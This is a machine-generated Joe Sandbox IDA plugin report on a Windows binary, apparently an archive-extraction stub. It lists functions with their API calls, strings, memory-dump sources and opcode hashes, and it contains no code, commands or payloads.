Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6a7e6404cbdf331bb7f85d48eb94c7b3254db2d1eb8e5a51f6f248f418a4eb3a
Instruction ID: 456ce9e102e30f80517bd593a334b3bd647dcee849f42b6cfbb3fe4cab0e7d1e
Opcode Fuzzy Hash: 6a7e6404cbdf331bb7f85d48eb94c7b3254db2d1eb8e5a51f6f248f418a4eb3a
Instruction Fuzzy Hash: BAA011CA2AA080BC300822A22E0AE3B030CC0C0B22330A22EF80088080A88C0A220830

Function 007CE5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE580

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0c52478fbb8c1d56728117a98fb896b3bc8fcf5c311241e9d88e75ccd739fda9
Instruction ID: 77b940e2a090b20dc90c31d38868931fcd02173aaadbb6e4b7f9fea0bd8dec33
Opcode Fuzzy Hash: 0c52478fbb8c1d56728117a98fb896b3bc8fcf5c311241e9d88e75ccd739fda9
Instruction Fuzzy Hash: 74A011CA2AA082FC300822A22E0AE3B030CC0C8B20330A82EF80288080A88C08220830

Function 007CE58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE580

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c5d8a97d68345f996ae40db2332fec03206996ec9410e167d2c43effac54669a
Instruction ID: 77b940e2a090b20dc90c31d38868931fcd02173aaadbb6e4b7f9fea0bd8dec33
Opcode Fuzzy Hash: c5d8a97d68345f996ae40db2332fec03206996ec9410e167d2c43effac54669a
Instruction Fuzzy Hash: 74A011CA2AA082FC300822A22E0AE3B030CC0C8B20330A82EF80288080A88C08220830

Function 007B9F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE(?,007B903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 007B9F0C

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: 79c7b7cbad8369498066443f6564f451d51938c2036da5505cf3752bdf75962f
Instruction ID: a16d1d7ac510c7af564a63aab44e92fec82f175f67de3e01525788228512ede9
Opcode Fuzzy Hash: 79c7b7cbad8369498066443f6564f451d51938c2036da5505cf3752bdf75962f
Instruction Fuzzy Hash: 77A0223008000E8BCE202B30CE0C00C3B22FB20BC030082E8A00BCF0B2CB2B8A0BCB00

Function 007CAC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?,007CAE72,C:\Users\user\Desktop,00000000,007F946A,00000006), ref: 007CAC08

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: e72adf2325b1c723df1406532be48d72fabf4d7d541893bc83d20b80c7b2d301
Instruction ID: 23c39f614d6f445205edfad4eb2f81aadd5dbc4a40f8329a4f0efd8c4fee9f98
Opcode Fuzzy Hash: e72adf2325b1c723df1406532be48d72fabf4d7d541893bc83d20b80c7b2d301
Instruction Fuzzy Hash: D6A012301011408782000B318F4950E76556F51700F01C038600084030C738C820A504

Function 007B9620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(000000FF,?,?,007B95D6,?,?,?,?,?,007E2641,000000FF), ref: 007B963B

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: fa345c636fe7b64362dae892175606623b9e0d37fa07049502913ac737a7dce3
Instruction ID: 0d10a38692fdb7d8ae3fc4e37545ab5c36f500c687ab2727c2637ebd0087295c
Opcode Fuzzy Hash: fa345c636fe7b64362dae892175606623b9e0d37fa07049502913ac737a7dce3
Instruction Fuzzy Hash: 61F08970481B559FDB308A25C458BD277F86B12325F145B1ED3F683AE0D769658D8A40

Non-executed Functions

Function 007CC220 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 286timewindowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 007B1316: GetDlgItem.USER32(00000000,00003021), ref: 007B135A
Part of subcall function 007B1316: SetWindowTextW.USER32(00000000,007E35F4), ref: 007B1370

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 007CC2B1
EndDialog.USER32(?,00000006), ref: 007CC2C4
GetDlgItem.USER32(?,0000006C), ref: 007CC2E0
SetFocus.USER32(00000000), ref: 007CC2E7
SetDlgItemTextW.USER32(?,00000065,?), ref: 007CC321
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 007CC358
FindFirstFileW.KERNEL32(?,?), ref: 007CC36E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007CC38C
FileTimeToSystemTime.KERNEL32(?,?), ref: 007CC39C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 007CC3B8
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 007CC3D4
_swprintf.LIBCMT ref: 007CC404

Part of subcall function 007B4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007B40A5

SetDlgItemTextW.USER32(?,0000006A,?), ref: 007CC417
FindClose.KERNEL32(00000000), ref: 007CC41E
_swprintf.LIBCMT ref: 007CC477
SetDlgItemTextW.USER32(?,00000068,?), ref: 007CC48A
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 007CC4A7
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 007CC4C7
FileTimeToSystemTime.KERNEL32(?,?), ref: 007CC4D7
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 007CC4F1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 007CC509
_swprintf.LIBCMT ref: 007CC535
SetDlgItemTextW.USER32(?,0000006B,?), ref: 007CC548
_swprintf.LIBCMT ref: 007CC59C
SetDlgItemTextW.USER32(?,00000069,?), ref: 007CC5AF

Part of subcall function 007CAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 007CAF35
Part of subcall function 007CAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,007EE72C,?,?), ref: 007CAF84

Strings

REPLACEFILEDLG, xrefs: 007CC247
P|, xrefs: 007CC342
%s %s %s, xrefs: 007CC3F2, 007CC527
%s %s, xrefs: 007CC469, 007CC58E

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$P|$REPLACEFILEDLG
API String ID: 797121971-1346461621
Opcode ID: 75b10f860b9d7e616005ac16eefdecc353722c6343a6306c30483235bb7028d2
Instruction ID: db1e6e6faa396aca67c4acf5b41edd5dc936d2a81066c0099028e5fbded32300
Opcode Fuzzy Hash: 75b10f860b9d7e616005ac16eefdecc353722c6343a6306c30483235bb7028d2
Instruction Fuzzy Hash: D59154B2148348BBE2219BA4DD4DFFB77ECFB4A704F44481DF649D6081D779AA048B62

Function 007B6FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 007B6FAA
_wcslen.LIBCMT ref: 007B7013
_wcslen.LIBCMT ref: 007B7084

Part of subcall function 007B7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 007B7AAB
Part of subcall function 007B7A9C: GetLastError.KERNEL32 ref: 007B7AF1
Part of subcall function 007B7A9C: CloseHandle.KERNEL32(?), ref: 007B7B00

Part of subcall function 007BA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,007B977F,?,?,007B95CF,?,?,?,?,?,007E2641,000000FF), ref: 007BA1F1
Part of subcall function 007BA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,007B977F,?,?,007B95CF,?,?,?,?,?,007E2641), ref: 007BA21F

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 007B7139
CloseHandle.KERNEL32(00000000), ref: 007B7155
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 007B7298

Part of subcall function 007B9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,007B73BC,?,?,?,00000000), ref: 007B9DBC
Part of subcall function 007B9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 007B9E70

Part of subcall function 007B9620: CloseHandle.KERNELBASE(000000FF,?,?,007B95D6,?,?,?,?,?,007E2641,000000FF), ref: 007B963B

Part of subcall function 007BA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,007BA325,?,?,?,007BA175,?,00000001,00000000,?,?), ref: 007BA501
Part of subcall function 007BA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,007BA325,?,?,?,007BA175,?,00000001,00000000,?,?), ref: 007BA532

Strings

SeRestorePrivilege, xrefs: 007B6FC2
SeCreateSymbolicLinkPrivilege, xrefs: 007B6FCC
\??\, xrefs: 007B702B
UNC\, xrefs: 007B7051

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3983180755-3508440684
Opcode ID: 185fb8e58b024639e72edd9c601d3853250fd41a85b37671ab7a7582245f3068
Instruction ID: 1c3eb39118de4d9aa7542e09d1778b3ddc571aadd80bbe0edd3687ae0e51858b
Opcode Fuzzy Hash: 185fb8e58b024639e72edd9c601d3853250fd41a85b37671ab7a7582245f3068
Instruction Fuzzy Hash: D0C1DC71904648EADB25DB74CC89FFEB7B8AF44300F40455AFA56E7282D73CAA44CB61

Function 007DD8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 007DDA34

Strings

1#SNAN, xrefs: 007DEC33
1#QNAN, xrefs: 007DEC3A
1#INF, xrefs: 007DEC41
1#IND, xrefs: 007DEC2C

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 1424be3f841cfa8512ba0dbba40d3dc4b71b72781148de66765d9999fb33ad2f
Instruction ID: 20d540de330fa23fa3238865842826c7f69fb893a4f754e97e5c0b67501bbec6
Opcode Fuzzy Hash: 1424be3f841cfa8512ba0dbba40d3dc4b71b72781148de66765d9999fb33ad2f
Instruction Fuzzy Hash: 42C22871E086288FDB66DE289D447EAB7B5EB44304F1541EBD44EEB340E779AE818F40

Function 007B32F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 007B3300
_swprintf.LIBCMT ref: 007B36C7

Strings

CMT, xrefs: 007B3A17
h%u, xrefs: 007B36BC
hc%u, xrefs: 007B370A

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: H_prolog_swprintf
String ID: CMT$h%u$hc%u
API String ID: 146138363-3282847064
Opcode ID: 476f7e8cfda7941c52b39174a29db4e7169def5bb72f5dc689514d789999d679
Instruction ID: 4ae81e7bc9cb3b722bcfbcfb0fb81cb8137fe8087a269eb0d9f1693a89a5897d
Opcode Fuzzy Hash: 476f7e8cfda7941c52b39174a29db4e7169def5bb72f5dc689514d789999d679
Instruction Fuzzy Hash: 8F32C571510284EFDF15DF74C899BEA3BA5AF15300F04457DFD8A8B286DB78A689CB20

Function 007B286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 007B2874
_strlen.LIBCMT ref: 007B2E3F

Part of subcall function 007C02BA: __EH_prolog.LIBCMT ref: 007C02BF

Part of subcall function 007C1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,007BBAE9,00000000,?,?,?,0001048C), ref: 007C1BA0

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007B2F91

Strings

CMT, xrefs: 007B2FBC

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
String ID: CMT
API String ID: 1206968400-2756464174
Opcode ID: 43eba14c8c825d5f107e00d7ea179441302040a77b08f542f5f1ad011a1a6a85
Instruction ID: ce6159e8dfb10c5097b465bfba43cd72326af9c01b8fc199a39c217af89644e1
Opcode Fuzzy Hash: 43eba14c8c825d5f107e00d7ea179441302040a77b08f542f5f1ad011a1a6a85
Instruction Fuzzy Hash: 6F62E871601245CFDB19DF34C8997EA3BA1BF54300F08857EED9A8B283DB799946CB60

Function 007CF838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 007CF844
IsDebuggerPresent.KERNEL32 ref: 007CF910
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 007CF930
UnhandledExceptionFilter.KERNEL32(?), ref: 007CF93A

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: b40f95e4d720197ce32f683f1c2c41fa664581350957f150e0eda22955a25ec5
Instruction ID: 4d2fda8877684f60e80bfa7de677e2b4e4512e1cb1c4985044b979379a4e0cef
Opcode Fuzzy Hash: b40f95e4d720197ce32f683f1c2c41fa664581350957f150e0eda22955a25ec5
Instruction Fuzzy Hash: 4B310775D0521DDBDB20DFA4D989BCCBBB8AF08304F1041AEE40DAB250EB759A848F44

Function 007CE6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualQuery.KERNEL32(80000000,007CE5E8,0000001C,007CE7DD,00000000,?,?,?,?,?,?,?,007CE5E8,00000004,00811CEC,007CE86D), ref: 007CE6B4
GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,007CE5E8,00000004,00811CEC,007CE86D), ref: 007CE6CF

Strings

D, xrefs: 007CE6C3

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: InfoQuerySystemVirtual
String ID: D
API String ID: 401686933-2746444292
Opcode ID: 7c0f0e8d32028a07cbf2ebba39d0863669679d8ed7e7465b04545a21885c94d4
Instruction ID: 392ba275b99162e5155f5e5e74fd950a3c46f13ec6d4e8b333656a0d3afc9a87
Opcode Fuzzy Hash: 7c0f0e8d32028a07cbf2ebba39d0863669679d8ed7e7465b04545a21885c94d4
Instruction Fuzzy Hash: 7201A772600509ABDB14DE29DC49FED7BAAAFC4324F0CC128ED59DB154D638D9458690

Function 007D8EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 007D8FB5
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 007D8FBF
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 007D8FCC

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 4a991eac353a579ef2246bf387478112dbebd7d0db3a122bf81bf9fdd160e5b1
Instruction ID: d0ceb30878e35c8ee9f394b9e63bddf108f14caf2c16dc185614a953b1b19840
Opcode Fuzzy Hash: 4a991eac353a579ef2246bf387478112dbebd7d0db3a122bf81bf9fdd160e5b1
Instruction Fuzzy Hash: F831C47590121CABCB61DF64DC89B9DBBB8AF08310F5081EEE41CA7250EB749F858F45

Function 007DB348 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

., xrefs: 007DB4DB

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: bbe07e7577070cf10b76c2fd0fd2f14c902b3b60f0e0574cf48114b7d27c10f4
Instruction ID: 1abd63418503b0cd7e4c0ca80ab8b7f6bf2a02edb5fc457064edbeb58fe75a46
Opcode Fuzzy Hash: bbe07e7577070cf10b76c2fd0fd2f14c902b3b60f0e0574cf48114b7d27c10f4
Instruction Fuzzy Hash: 81310471900289EFCB24DE78CC88EFA7BBDDB85304F1541AAE91997352E7389E458B50

Function 007DD440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE

